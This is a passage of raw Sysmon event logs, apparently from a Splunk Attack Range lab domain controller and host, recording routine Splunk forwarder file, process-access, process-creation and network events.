Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=681729432E3E4D7ECDB9CF7F2E082ECF,SHA256=B575346BBEF8FF752605D2BB7D2BEB6F9C11F3890AF424B46B1899720D7A355C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298771Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:59.137{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37C4AB036DC34D5ADA64E20FAE5EDC56,SHA256=CF7E8F08482D0A6CA9C79CE13A6C785607626408CF368A21D864E82AD6A51C99,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222659Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:55.587{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51730-false10.0.1.12-8000- 23542300x8000000000000000222661Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:00.975{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F115A835D7DDC93A85C53784CD13ECC,SHA256=77B01709B1CBBC8ED459478EF2E3D88F714635FB7F90A0F6192B00BBA277E610,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298772Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:00.183{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2442E9EE0809C1FC0E68E76932B7AA61,SHA256=C29A705C1AB2A06AD7F853B7FCAC0F27B3D2118F26920B109D30F8D797BEFD58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222662Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:01.975{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=202592D11DB1011BCC07A970E535553F,SHA256=8D6E9CCD68AE15650CE134E39C82C0C53FDC1A34B52F4DCA4C3454AF210859FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298781Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:01.436{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1951-6216-6107-000000003802}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298780Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:01.436{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298779Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:01.436{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298778Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:01.436{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298777Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:01.436{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298776Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:01.436{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1951-6216-6107-000000003802}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298775Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:01.436{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1951-6216-6107-000000003802}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298774Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:01.437{C8EA50B7-1951-6216-6107-000000003802}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298773Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:01.183{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A29934E1010DD88A9DE27A691C7EFEA8,SHA256=849B99D38C01AA7545BDD694A6E084ED571069ED764113DF42189D3652A76911,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222663Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:02.991{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2761975BDA908882E23081479AE729DF,SHA256=8768D575D8A4F3E5D4ECD419255818D17775C5E8004630C3F0C598D27DE4D14B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298792Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:02.563{C8EA50B7-1952-6216-6207-000000003802}63046312C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000298791Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:59.646{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49563-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000298790Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:02.301{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1952-6216-6207-000000003802}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298789Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:02.301{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1952-6216-6207-000000003802}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298788Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:02.300{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1952-6216-6207-000000003802}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298787Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:02.298{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298786Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:02.298{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298785Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:02.298{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298784Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:02.298{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298783Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:02.297{C8EA50B7-1952-6216-6207-000000003802}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298782Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:02.201{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71BF082186AFDCBB92DF14AB105B0A12,SHA256=7BFD094A33A1EB339E695FE58268B0EAC813B3B5D2AAB1D4E2586972DFAB33C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222664Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:03.991{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1120D54918F1577BF492594291FB290C,SHA256=448F06B50959CA904DDE57397C789D83C6B6AE43F50564BB6CE59CA417DAA95A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298801Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:03.747{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1953-6216-6307-000000003802}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298800Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:03.747{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298799Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:03.747{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298798Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:03.747{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298797Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 